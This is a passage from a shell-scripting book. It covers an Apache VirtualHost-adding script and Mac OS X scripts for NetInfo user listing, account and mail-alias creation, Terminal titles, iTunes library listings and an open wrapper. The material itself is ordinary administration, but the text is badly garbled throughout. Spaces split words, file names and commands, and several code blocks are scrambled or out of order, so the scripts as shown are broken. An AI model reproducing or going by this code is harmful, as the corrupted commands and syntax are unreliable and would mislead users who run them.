In a similar way, many web hosting companies have their own preferred set of entries in a Vi rt u al Ho s t block, and
perhaps a more restrictive Di recto ry privilege set than the one specified in this script. In both cases, fine-tuning the
script once ensures that all subsequent accounts are created with exactly the right permissions and configuration.
The script takes particular pains to avoid leaving you with a corrupted h t tp d. c on f file (which could be disastrous): It
copies the content in the current ht tpd. conf file to a temporary file (h t tp . co nf . MM DD H HM M, e.g.,
h tt p.c o nf. 10 031 11 8), injects the new V ir t u alH o s t and D i re ct o ry blocks into the live ht t pd .c o nf
file, and then restarts the web server. If the server restart returns without an error, all is well, and the old config file is
kept for archival purposes. If the restart fails, however, the following code is executed:
i f $re s tar t ; t he n
m v $ h ttp co nf $h ttpc onf. faile d .$d a t e
m v $ h ttp co nf. $d ate $htt pconf
$ res t art
e cho "Co nf igu ra tion app ears t o h a v e f a i le d; r e st ar t ed wi th ol d c on fi g " >& 2
e cho "Fa il ed co nfig urat ion i s in $ htt p c on f. fa i le d. $ da t e" > & 2
e xit 1
fi
The live h t tpd .c onf file is moved to ht tp .c o n f.f a i led . MM D DH HM M , and the old ht t p. co n f file, now
saved as htt p. con f. MMD DHHMM , is moved back into place. The web server is started once again, and an error
message is output.
These hoops, as shown in the snippet just given, ensure that, whether the V i rt u al Ho s t addition is successful or
not, a copy of both the original and edited h tt p. c o nf files remains in the directory. The only stumbling block with
this technique occurs if the rest art command doesn't return a nonzero return code upon failure. If this is the case,
it's well worth lobbying the developer to have it fixed, but in the meantime, if the script thinks that the r es ta r t went
fine but it didn't, you can jump into the conf directory, move the new ht t p. c on f file to
h tt p.c o nf. fa ile d. MMDD HHMM , move the old version of the configuration file, now saved as
h tt pd. c onf .M MDD HH MM, back to ht tpd. c o nf, and then restart by hand.

Running the Script


This script requires three arguments: the name of the new domain, the email address of the administrator for Apache
error message pages, and the account name of the user who is going to own the resultant directories. To have the
output displayed onscreen rather than actually modifying your h t tp d .c on f file, include the - n flag. Note that you
will doubtless need to modify the value of the first few variables in the script to match your own configuration before
you proceed.

The Results
Because the script doesn't have any interesting output when no errors are encountered, let's look at the "show, but
don't do" output instead by specifying the -n flag to a d dvi r t ua l:
$ a ddv i rtu al -n b aby. net admin @ bab y . net t ay lo r
m kd ir / etc /h ttp d/ html /bab y.net /va r / log / h tt pd // b ab y. n et
c ho wn t ayl or /e tc /htt pd/h tml/b a by. n e t / v a r/ lo g/ h tt pd / /b a by .n e t

# ## ### # Vi rt ual H ost setu p for bab y . net # ## ## ## # ## #


< Vi rtu a lHo st ww w. baby .net baby . net >
S er ver N ame w ww. ba by.n et
S er ver A dmi n adm in @bab y.ne t
D oc ume n tRo ot /e tc /htt pd/h tml/b a by. n e t
E rr orL o g l og s/b ab y.ne t/er ror_l o g
T ra nsf e rLo g log s/ baby .net /acce s s_l o g
< /V irt u alH os t>
< Di rec t ory / etc /h ttpd /htm l/bab y .ne t >
O pt ion s In de xes F ollo wSym Links Inc l u des
A ll owO v err id e A ll
o rd er a llo w, den y
a ll ow f rom a ll
< /D ire c tor y>
T ip : C o py th e a bo ve b lock into /et c / htt p d /c on f/ h tt pd . co n f an d
r es tar t th e ser ve r wi th / usr/l o cal / b in/ r e st ar t_ a pa ch e a n d yo u 'r e d on e.

Hacking the Script


There are two additions to the script that would be quite useful: First, create a new website directory and automatically
copy in an in de x.h tm l and perhaps a custom 404 error page, replacing in the 404 error page a specific string like
% %d oma i n%% with the new domain name, and % %ad m i n e m a il %% with the email address of the administrator.
A second useful addition would be to test and possibly refine the r es t ar t testing; if your re st a rt program
doesn't return a nonzero value on failure, you could capture the output and search for specific words (like "failed" or
"error") to ascertain success or failure. Or immediately after restarting, use ps | gr ep to see if h t tp d is running, and
respond appropriately.

Chapter 11: Mac OS X Scripts


Overview
One of the most important changes in the world of Unix and Unix-like operating systems was the release of the
completely rewritten Apple Mac OS X system. Jumping from the older Mac OS 9, Mac OS X is built atop a solid and
reliable Unix core called Darwin. Darwin is an open source Unix based on BSD Unix, and if you know your Unix at all,
the first time you open the Terminal application in Mac OS X you'll doubtless gasp and swoon with delight. Everything
you'd want, from development tools to standard Unix utilities, is included with the latest generation of Macintosh
computers, with a gorgeous GUI quite capable of hiding all that power for people who aren't ready for it.
There are some significant differences between Mac OS X and Linux/Unix, however, not the least of which is that Mac
OS X uses a system database called NetInfo as a replacement for a number of flat information files, notably
/ et c/p a ssw d and /e tc/ alias es. This means that if you want to add a user to the system, for example, you
have to inject his or her information into the Ne tI n f o database, not append it to the / et c/ p as sw d file.
Additional changes are more on the fun and interesting side, fortunately. One tremendously popular Mac OS X
application that many people adore is i Tunes , an elegant and powerful MP3 player and online radio tuner application.
Spend enough time with iTunes, though, and you'll find that it's very hard to keep track of what songs are on your
system. Similarly, Mac OS X has an interesting command-line application called o pe n, which allows you to launch
graphical ("Aqua" in Mac OS X parlance) applications from the command line. But op e n could be more flexible than it
is, so a wrapper helps a lot.
There are other Mac OS X tweaks that can help you in your day-to-day interaction. For example, if you work on the
command line with files created for the GUI side of the Macintosh, you'll quickly find that the end-of-line character in
these files isn't the same as the character you need when working on the command line. In technical parlance, Aqua
systems have end-of-line carriage returns (notationally, an \ r character), while the Unix side wants newlines (an \ n).
Instead of a file in which each line is displayed one after the other, a Mac Aqua file will show up in the Terminal without
the proper line breaks. Have a file that's suffering from this problem? Here's what you'd see if you tried to c at it:
$ c at m ac- fo rma t- file .txt
$
Yet you know there's content. To see that there's content, use the - v flag to ca t , which makes all otherwise hidden
control characters visible. Suddenly you see something like this:
$ c at - v m ac -fo rm at-f ile. txt
T he ra i n i n Spa in ^Mfa lls mainl y on ^ M the p la in .^ M No k i dd i ng . I t do e s. ^M $
Clearly there's something wrong! Fortunately, it's easy to fix with t r:
$ t r ' \ r' '\ n' < mac- form at-fi l e.t x t > u n ix -f or m at -f i le . tx t
Once this is applied to the sample file, things start to make a lot more sense:
$ t r ' \ r' '\ n' < mac- form at-fi l e.t x t
T he ra i n i n Spa in
f al ls m ain ly on
t he pl a in.
N o kid d ing . It do es.
If you open up a Unix file in a Mac application like Microsoft Word and it looks all wonky, you can also switch end-ofline characters in the other direction toward an Aqua application:
$ t r ' \ n' '\ r' < unix file .txt > ma c f ile . t xt
One last little snippet before we get into the specific scripts for this chapter: easy screen shots in the world of Mac OS
X. If you've used the Mac for any length of time, you've already learned that it has a built-in screen capture capability
that you access by pressing CMD-SHIFT-3. You can also use the Mac OS X utility G r ab located in the
Applications/Utilities folder, and there are some excellent third-party choices, including Ambrosia Software's Sn ap z
P ro X, which I've used for the screen shots in this book.
However, did you know that there's a command-line alternative too? There's no man page for it, but
s cr een c apt ur e can take shots of the current screen and save them to the Clipboard or to a specific named file (in
JPEG or TIFF format). Type in the command without any arguments, and you'll see the basics of its operation:

$ s cre e nca pt ure


s cr een c apt ur e: il lega l us age, f ile r equ i r ed i f n ot g o in g t o c li pb o ar d
u sa ge: scr ee nca pt ure [-ic mwsWx ] [f i l e] [ c ur so r]
-i
ca ptu re scr een inter a cti v e ly, b y se le c ti on or wi nd o w
con tr ol k ey - caus e s s c r een s ho t to go t o c l ip bo a rd
spa ce key
- togg l e b e t wee n mo us e s el ec t io n a nd
wind o w s e l ect i o n mo de s
esc ap e ke y - canc e ls i n ter a c ti ve s c re en sh o t
-c
fo rce s cree n ca pture to g o to t he c li p bo ar d
-m
on ly ca ptur e th e mai n mo n i tor , un de fi n ed i f - i i s s et
-w
on ly al low wind ow se l ect i o n m o d e
-s
on ly al low mous e sel e cti o n mo d e
-W
st art i nter acti on in win d o w s e l ec ti on mo de
-x
do no t play sou nds
f ile
wh ere t o sa ve t he sc r een c apt u r e
This is an application begging for a wrapper script. For example, to take a shot of the screen 30 seconds in the future,
you could use
$ s lee p 30 ; scr ee ncap ture capt u re. t i ff
But what if you wanted to take a series of screen shots, spaced one minute apart? A simple loop would work:
m ax sho t s=6 0; co un ter= 0
w hi le [ $c ou nte r -lt $max shots ] ; d o
s cre e nca pt ure c aptu re${ count e r}. t i ff
c oun t er= $( (co un ter + 1) )
s lee p 60
d on e
This will take a screen shot every 60 seconds for 1 hour, creating 60 rather large TIFF files, over 1.5MB each,
sequentially numbered ca ptur e1.t iff, c ap t u re2 . t iff , ... ca pt u re 6 0. ti f f. This could be very useful
for training purposes, or perhaps you're suspicious that someone has been using your computer while you're at lunch:
Set this up, and you can go back and review what occurred without anyone ever knowing.
Let's look at some more complex scripts for Mac OS X.

#93 List NetInfo Users


To begin seeing how to work with NetInfo, here's a straightforward script that allows you to easily interface with the
NetInfo database through the nirep ort utility.

The Code
# !/ bin / sh
# l ist m acu se rs - Simp le s cript to l i st u s er s in th e M ac OS X Ne tI n fo d a ta ba s e.
#
No t e t ha t M ac OS X al so ha s an / etc / p as sw d f il e, bu t t ha t 's
#
us e d o nl y d ur ing the initi a l s t a ges o f bo ot ti me an d f or
#
re c ove ry bo ot ups. Oth erwis e , a l l da t a i s in th e N et I nf o d b.
f ie lds = ""
w hi le g eto pt s " Aa hnpr su" opt ; do
c ase $op t in
A ) fi el ds= "u id p assw d nam e re a l nam e ho me s h el l"
a ) fi el ds= "u id n ame realn a me h o me s h el l"
h ) fi el ds= "$ fiel ds h ome"
n ) fi el ds= "$ fiel ds n ame"
p ) fi el ds= "$ fiel ds p asswd "
r ) fi el ds= "$ fiel ds r ealna m e"
s ) fi el ds= "$ fiel ds s hell"
u ) fi el ds= "$ fiel ds u id"
? ) ca t << EO F >& 2
U sa ge: $0 [A |a| hn prsu ]
W he re:
-A
o ut put a ll k nown NetI n fo u s er f i el ds
-a
o ut put o nly the inter e sti n g us e r f ie ld s
-h
s ho w h om e di rect ories of a c cou n t s
-n
s ho w a cc ount nam es
-p
p as swd ( encr ypte d)
-r
s ho w r ea lnam e/fu llnam e va l u es
-s
s ho w l og in s hell
-u
u id
E OF
e xi t 1
e sac
d on e

;;
;;
;;
;;
;;
;;
;;
;;

e xe c n i rep or t . / user s ${ field s :=u i d na m e r ea ln a me h o me sh el l }

How It Works
Almost this entire script is involved in building the variable f iel d s, which starts out blank. The n i re po r t utility
allows you to specify the names of the fields you'd like to see, and so, for example, if the user specifies -a for all
interesting fields, ni rep or t actually is fed
f ie lds = "ui d nam e real name home she l l "
This is a clear, straightforward script that should be quite easily understood.

Running the Script


The lis t mac us ers script accepts quite a few different command arguments, as shown in the usage message. You
can specify exact fields and field order by using hn p r su, or you can list all fields except the encrypted password field
with -a or force everything to be listed with -A . Without any arguments, the default behavior is to show all interesting
user fields (-a).

The Results
First off, let's specify that we want to see the user ID, login name, real name, and login shell for every account in the

NetInfo database:
$ l ist m acu se rs -u -n -r - s
-2
no bo dy U npri vile ged U s er
/ de v/ nu l l
0
ro ot
S yste m Ad minis t rat o r
/ bi n/ tc s h
1
da em on S yste m Se rvice s /d e v /nu l l
99
un kn own U nkno wn U ser
/d e v /nu l l
25
sm ms p
S endm ail User
/d e v /nu l l
70
ww w
W orld Wid e Web Ser v e r
/ de v/ nu l l
74
my sq l
M ySQL Ser ver
/d e v /nu l l
75
ss hd
s shd Priv ilege sep a r ati o n
/d ev / nu l l
5 05
te st 3
M r. T est Three
/b i n /tc s h
5 01
ta yl or D ave Tayl or
/b i n /ba s h
5 02
ba dg uy T est Acco unt
/b i n /tc s h
5 03
te st
/ bin/t c sh
5 06
ti nt in T inti n, B oy Re p ort e r
/ bi n/ tc s h
5 07
ga ry
G ary Gary
/b i n /ba s h
Notice that it shows many of the administrative accounts (basically everything with a login shell of / de v /n ul l ). If we
want to see only login accounts, we'll want to screen out the / d ev /n ul l shells:
$ l ist m acu se rs -u -n -r - s | g r ep - v /d e v /n ul l
0
roo t
Sy stem Adm inist r ato r
/ b in /t cs h
5 05
tes t3
Mr . Te st T hree
/bi n / tcs h
5 01
tay lo r
Da ve T aylo r
/bi n / bas h
5 02
bad gu y
Te st A ccou nt
/bi n / tcs h
5 03
tes t
/b in/tc s h
5 06
tin ti n
Ti ntin , Bo y Rep o rte r
/ b in /t cs h
5 07
gar y
Ga ry G ary
/bi n / bas h
The bad g uy account isn't supposed to be there! To find out what's going on there, and to modify NetInfo entries, it's
wise to use the Apple-supplied NetInfo Manager application, which can be found in Applications/Utilities or launched
from the command line with the command
o pe n - a "N et Inf o Mana ger"

#94 Adding a User to a Mac OS X System


Earlier in the book, in Script #44, you saw the basic steps involved in adding a new user to a typical Unix or Linux
system. The Mac OS X version is fundamentally quite similar. In essence, you prompt for an account name and login
shell, append the appropriate information to the / e t c / p a s s w d and / e t c / s h a d o w files, create the new user's
home directory, and set an initial password of some sort. With Mac OS X it's not quite this simple, because appending
information to / etc/ p assw d will not create a new Aqua account. Instead, the information must be injected into the
NetInfo system using the niut i l command.

The Code
# ! / b in /s h
#
#
#
#
#

a d dm ac use r - A d ds a new use r t o t h e s y s t e m , i n c l u d i n g b u i l d i n g t h e


home dire c tory , c o p y i n g i n d e f a u l t c o n f i g d a t a , e t c .
Y o u ca n c h oose to h a ve e ver y u s e r i n h i s o r h e r o w n g r o u p ( w h i c h r e q u i r e s
a fe w twe a ks) o r us e the de f a u l t b e h a v i o r o f h a v i n g e v e r y o n e p u t
i n to t he s ame g roup . Twe ak d g r o u p a n d d g i d t o m a t c h y o u r o w n c o n f i g .

d g r o up =" gue s t"; d gid= 3 1


h m d i r= "/ Use r s"
s h e l l= "u nin i tial i zed"

# default group and groupid

i f [ " $( /us r /bin / whoa m i)" != " r o o t " ] ; t h e n


e c ho " $(b a sena m e $0 ) : Yo u m u s t b e r o o t t o r u n t h i s c o m m a n d . " > & 2
e x it 1
fi
e c h o " Ad d n e w us e r ac c ount to $ ( h o s t n a m e ) "
e c h o - n "lo g in: "
; re ad l o g i n
i f n ir ep ort . /u s ers n ame | s e d ' s / [ ^ [ : a l n u m : ] ] / / g ' | g r e p " ^ $ l o g i n $ " ; t h e n
e c ho " $0: You a lrea d y ha ve a n a c c o u n t w i t h n a m e $ l o g i n " > & 2
e x it 1
fi
u i d 1 =" $( nir e port . /u s ers uid | s o r t - n | t a i l - 1 ) "
u i d = "$ (( $u i d1 + 1 )) "
h o m e di r= $hm d ir/$ l ogin
e c h o - n "fu l l na m e: " ; re ad f u l l n a m e
u n t i l [ -z " $she l l" - o -x "$s h e l l " ] ; d o
e c ho - n " s hell : "
; rea d s h e l l
done
e c h o " Se tti n g up acco u nt $ log i n f o r $ f u l l n a m e . . . "
e c h o " ui d=$ u id g id=$ d gid
sh e l l = $ s h e l l
home=$homedir"
n i u t il
n i u t il
n i u t il
n i u t il
n i u t il
n i u t il
n i u t il

- cre a te
- cre a tepr o p
- cre a tepr o p
- cre a tepr o p
- cre a tepr o p
- cre a tepr o p
- cre a tepr o p

.
.
.
.
.
.
.

/ user s/$ l o g i n
/ user s/$ l o g i n
/ user s/$ l o g i n
/ user s/$ l o g i n
/ user s/$ l o g i n
/ user s/$ l o g i n
/ user s/$ l o g i n

passwd
uid $uid
gid $dgid
realname "$fullname"
shell $shell
home $homedir

n i u t il - cre a tepr o p . / user s/$ l o g i n _ s h a d o w _ p a s s w d " "


# a d di ng th e m to the $ dgro up g r o u p
n i u t il - app e ndpr o p . / grou ps/ $ d g r o u p u s e r s $ l o g i n
i f ! m kd ir - m 75 5 $ho m edir ; t h e n
e c ho " $0: Fail e d ma k ing hom e d i r e c t o r y $ h o m e d i r " > & 2
e c ho " (cr e ated acco u nt i n N e t I n f o d a t a b a s e , t h o u g h . C o n t i n u e b y h a n d ) " > & 2
e x it 1
fi
i f [ - d /et c /ske l ] ; then
d i tt o /et c /ske l /.[a - zA-Z ]* $ h o m e d i r
else

d i tt o "/S y stem / Libr a ry/U ser T e m p l a t e / E n g l i s h . l p r o j " $ h o m e d i r


fi
c h o w n -R ${ l ogin } :$dg r oup $ho m e d i r
e c h o " Pl eas e ent e r an init ial p a s s w o r d f o r $ l o g i n : "
p a s s wd $ log i n
e c h o " Do ne. Acco u nt s e t up an d r e a d y t o u s e . "
exit 0

How It Works
This script checks to ensure that it's being run by r o o t (a non-r o o t user would generate permission errors with each
call to n iu til and the m k dir calls, and so on) and then uses the following test to check whether the specified
account name is already present in the system:
n i r e po rt . / user s nam e | s ed ' s / [ ^ [ : a l n u m : ] ] / / g ' | g r e p " ^ $ l o g i n $ "
You've already seen in Script #93 that n ire p o r t is the easy way to interface with the NetInfo system, so it should be
straightforward that this call generates a list of account names. It uses s e d to strip all spaces and tabs and then uses
g r e p to search for the specified login name, left rooted (^ is the beginning of the line) and right rooted ($ is the end
of the line). If this test succeeds, the script outputs an error and quits.
The script also uses nir e port to extract the highest user ID value in the NetInfo database and then increments it by
1 to generate the new account ID value:
u i d 1 =" $( nir e port . /u s ers uid | s o r t - n | t a i l - 1 ) "
u i d = "$ (( $u i d1 + 1 )) "
Notice the use of the -n flag with so rt to ensure that s o r t organizes its results from lowest to highest (you can
reverse it with - n r instead, but that wouldn't work in this context), and then the use of t a i l - 1 to pull off just the
highest ui d on the list.
The user is then prompted to enter a login shell over and over until either it's matched to an executable program or it's
ascertained to be an empty string (empty strings default to / b i n / s h as the login shell):
u n t i l [ -z " $she l l" - o -x "$s h e l l " ] ; d o
e c ho - n " s hell : "
; rea d s h e l l
done
And finally we're ready to create the actual account in the NetInfo database with n i u t i l . The first line creates an
entry for the account in NetInfo, using -crea t e , and the subsequent account attributes are added with c r e a te pr op. Notice that a sp e cial _s h a d o w _ p a s s w d field is created, though its value is left as null. This is
actually a placeholder for the future: NetInfo doesn't store the encrypted password in a secret place. Yet.
Instead of using cp - R to install user files and directories into the new account, the script uses a Mac OS X-specific
utility called dit t o. The dit t o command ensures that any files that might have special resource forks (an Aquaism) are copied intact.
Finally, to force the password to be set, the script simply calls p a s s w d with the special notation that only the root user
can utilize: pas s wd a c coun t , which sets the password for the specified account.

Running the Script


This script prompts for input, so no command flags or command-line arguments are necessary.

The Results
$ a d dm ac use r
a d d m ac us er: You m ust b e ro ot t o r u n t h i s c o m m a n d .
Like any administrative command, this one must be run as r o o t rather than as a regular user. This is easily solved
with the su do command:
$ s u do a ddm a cuse r
A d d ne w use r acc o unt t o Th eBo x . l o c a l .
l o g i n: g are t h
f u l l n am e: G aret h Tay l or
s h e l l: / bin / bash
S e t t in g up a ccou n t ga r eth for G a r e t h T a y l o r . . .
u i d = 50 8 gi d =31
shel l =/bi n/b a s h h o m e = / U s e r s / g a r e t h
P l e a se e nte r an i niti a l pa ssw o r d f o r g a r e t h :
C h a n gi ng pa s swor d for gare th.
N e w pa ss wor d :
R e t y pe n ew p assw o rd:
D o n e . Ac cou n t se t up a nd r ead y t o u s e .

That's all there is to it. Figure 11-1 shows the login window with account g a r e t h as one of the choices.

Figure 11-1: Login window with Gareth's account included

Hacking the Script


Probably the greatest adjustment that might be required for this script is to change the group membership model.
Currently the script is built to add all new users to the g u e s t group, with the group ID specified as d g i d at the
beginning of the script. While many installations might work fine with this setup, other Mac OS X sites emulate the
Linux trick of having every user in his or her own group. To accomplish that, you'd want to add a block of new code
that auto-generates a group ID one value higher than the largest group ID currently in the NetInfo database and then
instantiates the new group using the niuti l s command:
n i u t il - cre a te

. /gro ups / $ l o g i n

Another nice hack might be to automatically email new users a welcome message, so that when they first open up
their mailer there are some basic instructions on how to work with the system, what the default printer is, and any
usage and network access policies.

#95 Adding an Email Alias


While Mac OS X does include a standard Unix mail transport system built around the venerable and remarkably
complex send mai l system, it doesn't enable this system by default. To do that requires a number of complex steps,
a task more complex than we can discuss in this book. If you do have se nd m ai l running on your Mac OS X box,
however, you'll doubtless want to be able to add mail aliases in a simple manner. But mail aliases aren't in
/ et c/a l ias es anymore; they're now part of the NetInfo system. This script offers an easy work-around.
Setting up sendmail

A variety of sites offer instructions on how to set up se nd m ai l on your Mac


OS X system, and some simple freeware applications are even available to set
it up automatically. If you want to do it yourself, go to O'Reilly's MacDevCenter
at http://www.macdevcenter.com/ and search for "sendmail," or take the easy
way out and go to Version Tracker at http://www.versiontracker.com/ and,
again, search for "sendmail" to find a variety of freeware configuration utilities.
Make sure the solution you try is for your exact version of Mac OS X.

The Code
# !/ bin / sh
# a ddm a cal ia s - A dds a ne w ali a s t o the e ma il a l ia s d at a ba se on M a c OS X.
#
Th i s p re sum es tha t yo u've e nab l e d s e n dm ai l, wh ic h c a n be ki nd of
#
tr i cky . Go to htt p:// www.m a cde v c ent e r .c om / a nd s e ar c h fo r " se n dm ai l "
#
fo r so me go od ref eren ce wo r ks.
s ho wal i ase s= "ni du mp a lias es ."
i f [ " $ (/u sr /bi n/ whoa mi)" != " r oot " ] ; t he n
e cho "$( ba sen am e $0 ): Y ou mu s t b e roo t to r un th is co m ma nd . " >& 2
e xit 1
fi
i f [ $ # -e q 0 ] ; the n
e cho -n "A lia s to c reat e: "
r ead ali as
e ls e
a lia s =$1
fi
# N ow l et' s che ck to see if th a t a l i as a l re ad y e xi st s .. .
i f $sh o wal ia ses | gre p "$ {alia s }:" > /de v / nu ll 2 > &1 ; th e n
e cho "$0 : mai l alia s $a lias a lre a d y e x i st s" > & 2
e xit 1
fi
# L ook s go od . l et 's g et t he RH S an d inj e c t it i n to N e tI n fo
e ch o - n "p oi nti ng to: "
r ea d r h s # t he ri ght- hand side of t h e a l i as
n iu til -cr ea te . /ali ases /$ali a s
n iu til -cr ea tep ro p . /ali ases/ $ ali a s na m e $ al ia s
n iu til -cr ea tep ro p . /ali ases/ $ ali a s me m b er s "$ r hs "
e ch o " A lia s $al ia s cr eate d wit h out i nci d e nt ."
e xi t 0

How It Works
If you've studied Script #94, Adding a User to a Mac OS X System, you should immediately see all the similarities
between that script and this one, including the test for r oot user and the invocations to ni ut i l with the flags c re ate and -c rea te pro p.
The most interesting snippet in this script is the test to see if the alias already exists:

i f $sh o wal ia ses | gre p "$ {alia s }:" > /de v / nu ll 2 > &1 ; th e n
e cho "$0 : mai l alia s $a lias a lre a d y e x i st s" > & 2
e xit 1
fi
It's a good example of how to properly use the result of a command as a test while discarding any output, either to
s td out or s tde rr . The notation > /dev /n ul l discards st d ou t , of course, and then the odd notation 2 >& 1
causes output device #2, st derr , to be mapped to output device #1, s t do ut , also effectively routing s td e rr to
/ de v/n u ll.

Running the Script


This script is fairly flexible: You can specify the alias you'd like to create on the command line, or it'll prompt for the
alias if you've forgotten. Otherwise, it prompts for needed fields and has no command flags.

The Results
$ s udo add ma cal ia s
A li as t o c re ate : gare th
p oi nti n g t o: ga re th@h otma il.co m
A li as g are th cr ea ted with out i n cid e n t.

Hacking the Script


It would be quite easy to add an -l flag or something similar to a dd ma c al ia s to produce a listing of all current
mail aliases, and that would significantly improve the utility of this simple script.

#96 Set the Terminal Title Dynamically


This is a fun little script for Mac OS X users who like to work in the Terminal application. Instead of having to use the
Terminal > Window Settings > Window dialog box to set or change the window title, you can use this script to change it
whenever you like.

The Code
# ! /bi n /sh
# t itl e ter m - T el ls t he M ac OS X T e r min a l a pp li c at io n t o c ha n ge i t s ti t le
#
to the v alu e spec ifie d as a n a r g ume n t t o th i s su c ci n ct s c ri pt .
i f [ $ # -e q 0 ] ; then
e cho "Us ag e: $0 tit le" >&2
e xit 1
e ls e
e cho -ne " \03 3] 0;$1 \007 "
fi
e xi t 0

How It Works
The Terminal application has a variety of different secret escape codes that it understands, and the ti t le te r m script
sends a sequence of E SC ] 0 ; ti tle B E L, which changes the title to the specified value.

Running the Script


To change the title of the Terminal window, simply type in the new title you desire.

The Results
There's no apparent output from the command:
$ t itl e ter m $(p wd )
However, it instantly changes the title of the Terminal window to the present working directory.

Hacking the Script


With one small addition to your .csh rc or .b a shr c (depending on what login shell you have), you can
automatically have the Terminal window title always show the current working directory. To use this to show your
current working directory, for example, you can use either of the following:
a li as p rec md 't it lete rm " $PWD" '
[ t cs h]
e xp ort PRO MP T_C OM MAND ="ti tlete r m \ " \ $PW D \ ""

[ b as h]

If you run either the t cs h shell (the default login shell for 10.2.x) or the ba sh shell (the default shell for 10.3.x, the
so-called Panther release of Mac OS X), you can drop one of the commands above into your .c sh r c or . ba s hr c,
and, starting the next time you open up a Terminal window, you'll find that your window title changes each time you
move into a new directory!

#97 Producing Summary Listings of iTunes Libraries


If you've used the excellent Mac OS X application iTunes for any length of time, you're sure to have a massive playlist
of CDs that you've scanned, downloaded, swapped, or what-have-you. Unfortunately, for all its wonderful capabilities,
iTunes doesn't have an easy way to export a list of your music in a succinct and easy-to-read format. Fortunately, it's
not hard to write a script to offer this functionality.

The Code
# !/ bin / sh
# i tun e lis t - L is ts y our iTune s li b r ary i n a su c ci nc t a n d at t ra ct i ve
#
ma n ner , sui ta ble for shari n g w i t h o t h er s, o r f or
#
sy n chr on izi ng (wi th d iff) i Tun e lib r a ri es o n d if f er e nt
#
co m put er s a nd lap tops .
i tu neh o me= "$ HOM E/ Musi c/iT unes"
i tu nec o nfi g= "$i tu neho me/i Tunes Mus i c Li b r ar y. xm l "
m us icl i b=" /$ (gr ep '>M usic Fold e r<' " $it u n ec on fi g " | c ut -d / - f5 - | \
cut -d\ < -f1 | sed 's/ %20/ / g') "
e ch o " Y our m usi c libr ary is at $mu s i cli b "
i f [ ! -d "$ mus ic lib" ] ; then
e cho "$0 : Con fu sed: Mus ic li b rar y $mu s i cl ib i s n' t a d i re ct o ry ?" >& 2
e xit 1
fi
e xe c f i nd "$ mus ic lib" -ty pe d - min d e pth 2 - ma xd e pt h 2 \ ! - na m e '. * ' -p r in t |
sed "s| $m usi cl ib/| |"

How It Works
Like many modern computer applications, iTunes expects its music library to be in a standard location in this case
~ /M usi c /iT un es Mu sic Libr ary/i T une s Lib r a ry / but allows you to move it elsewhere if desired.
The script needs to be able to ascertain the different location, and that's done by extracting the M u si c F ol de r field
value from the iTunes preferences file. That's what this pipe accomplishes:
m us icl i b=" /$ (gr ep '>M usic Fold e r<' " $it u n ec on fi g " | c ut -d / - f5 - | \
cut -d\ < -f1 | sed 's/ %20/ / g') "
The preferences file ($ itu ne conf ig) is an XML data file, so it's necessary to do some chopping to identify the
exact M usic Fol de r field value. Here's what the M usi c Fol d er value in my own iTunes config file looks like:
f il e:/ / loc al hos t/ Volu mes/ 110GB / iTu n e s%2 0 L ib ra ry /
The Mus i c F ol der value is actually stored as a fully qualified URL, interestingly enough, so we need to chop off
the f ile:/ /lo ca lho st / prefix, which is the job of the first c ut command. Finally, because many directories in
Mac OS X include spaces, and because the Mu s ic F o lde r field is saved as a URL, all spaces in that field are
mapped to % 20 sequences and have to be restored to spaces by the s ed invocation before proceeding.
With the Music Folder name determined, it's now easy to generate music lists on two Macintosh systems (or even an
iPod!) and then use the di ff command to compare them, making it a breeze to see which albums are unique to one
or the other system and perhaps to sync them up.

Running the Script


There are no command arguments or flags to this script.

The Results
$ i tun e lis t | h ea d
Y ou r m u sic l ibr ar y is at /Volu m es/ 1 1 0GB / i Tu ne s L ib ra r y/
A co ust i c A lc hem y/ Blue Chi p

A co ust i c A lc hem y/ Red Dust & Sp a nis h Lac e


A co ust i c A lc hem y/ Refe renc e Poi n t
A dr ian Leg g/ Mrs . Crow e's Blue W alt z
A l Jar r eau /H eav en And Ear th
A la n P a rso ns Pr oj ect/ Best Of T h e A l a n P a r so ns P r oj ec t
A la n P a rso ns Pr oj ect/ Eve
A la n P a rso ns Pr oj ect/ Eye In Th e Sk y
A la n P a rso ns Pr oj ect/ I Ro bot

Hacking the Script


All right, this isn't about hacking the script per se, but because the iTunes library directory is saved as a fully qualified
URL, it would be most interesting to experiment with having a web-accessible iTunes directory and then using the URL
of that directory as the Mu sic Fold er value in the XML file....

#98 Fixing the Open Command


As I discussed earlier, one neat innovation with Mac OS X is the addition of the op en command, which allows you to
easily launch the appropriate Aqua application for just about any type of file, whether it's a graphics image, a PDF
document, or even an Excel spreadsheet. The problem with o p en is that it's a bit quirky in its behavior, and if you
want to have it launch a named application, for example, you have to include the - a flag. More picky, if you don't
specify the exact application name, it will complain and fail. A perfect job for a wrapper script.

The Code
# !/ bin / sh
# o pen 2 - A sma rt wra pper for t he c o ol M a c OS X 'o pe n ' c om ma n d
#
to mak e it ev en m ore usefu l . B y def a u lt , op e n la u nc h es t h e
#
ap p rop ri ate a ppli cati on fo r a s p eci f i ed f il e o r d ir e ct or y
#
ba s ed on th e Aqua bin dings , an d has a l im it e d ab i li t y to
#
la u nch a ppl ic atio ns i f the y 're i n t h e / Ap pl i ca ti o ns di r.
# F irs t of f, wh at ever arg ument we' r e gi v e n, t ry it d i re c tl y:
o pe n=" / usr /b in/ op en"
i f ! $ o pen " $@" > /dev /nul l 2>& 1 ; t h en
i f ! $op en -a " $@" >/de v/nul l 2> & 1 ; t h en

fi

fi

# M ore t han o ne a rg? Don't kno w how t o de al wi th it : q ui t


if [ $ # -gt 1 ] ; the n
e cho " ope n: Can 't f igure out h ow t o o pe n o r la u nc h $ @" >& 2
e xit 1
el s e
c ase $ (ec ho $1 | tr '[:u p per : ] ' ' [ : lo we r: ] ') i n
ac ro bat
) ap p="Ac r oba t Rea d e r"
;;
ad re ss*
) ap p="Ad d res s Boo k "
;;
ch at
) ap p="iC h at"
;;
cp u
) ap p="Ac t ivi t y Mo n i to r"
;;
dv d
) ap p="DV D Pl a y er"
;;
ex ce l
) ap p="Mi c ros o f t E x c el "
;;
ne ti nfo
) ap p="Ne t Inf o Man a g er "
;;
pr ef s
) ap p="Sy s tem P ref e r en ce s"
;;
pr in t
) ap p="Pr i nte r Set u p U ti li t y"
;;
pr of il*
) ap p="Sy s tem P rof i l er "
;;
qt |q uic kt ime ) ap p="Qu i ckT i m e P l a ye r"
;;
sy nc
) ap p="iS y nc"
;;
wo rd
) ap p="Mi c ros o f t W o r d"
;;
* ) ech o "ope n: D on't k now w hat t o do w i th $ 1 " > &2
exi t 1
e sac
e cho " You a sked for $1 b u t I t hin k yo u me a n $a p p. " > &2
$ ope n -a "$ app"
fi

e xi t 0

How It Works
